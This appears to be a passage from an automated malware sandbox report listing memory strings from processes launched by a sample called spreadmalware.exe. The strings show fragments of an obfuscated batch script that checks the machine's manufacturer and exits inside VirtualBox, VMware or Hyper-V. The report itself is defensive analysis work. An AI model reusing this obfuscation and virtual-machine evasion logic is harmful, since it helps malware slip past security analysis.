"%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windows
Source: cmd.exe, 0000000B.00000003.1412286394.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif
Source: cmd.exe, 0000000B.00000003.1446133715.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OEELS
Source: cmd.exe, 0000000B.00000003.1424505875.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oa
Source: powershell.exe, 0000002E.00000002.1681483622.000002DE19D4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference
Source: powershell.exe, 0000002E.00000002.1681483622.000002DE19D4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\W
Source: cmd.exe, 0000000B.00000003.1433229188.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nz=oi
Source: csc.exe, 0000001F.00000002.1494199498.000001457350A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware,
Source: cmd.exe, 0000000B.00000003.1407694446.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: manufacturer%RhodmbvPs%OfNWzLLkslhbH6rKmFa158\nfor/ftokens=2 delims==slhbH6rKmFa158in('wmiccomputersystemgetmodel/value')dosetmodel%VmlZylUz%tdrUBDTooslhbH6rKmFa158\nif"%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%""Microsoft Corporation"if"%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%""Virtual Machine"exit\nif"%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%""VMware, Inc."exit\nif"%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%""VirtualBox"exitS
Source: cmd.exe, 0000000B.00000003.1420999011.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o1
Source: cmd.exe, 0000000B.00000003.1413838355.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o::=
Source: cmd.exe, 0000000B.00000003.1417527952.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o0
Source: spreadmalware.exe, 00000001.00000002.1291960958.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.1490901831.000001D0615A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.1471594162.000001D0615A1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2235182888.0000016D32760000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000002E.00000002.1686004925.000002DE7FA93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O(!
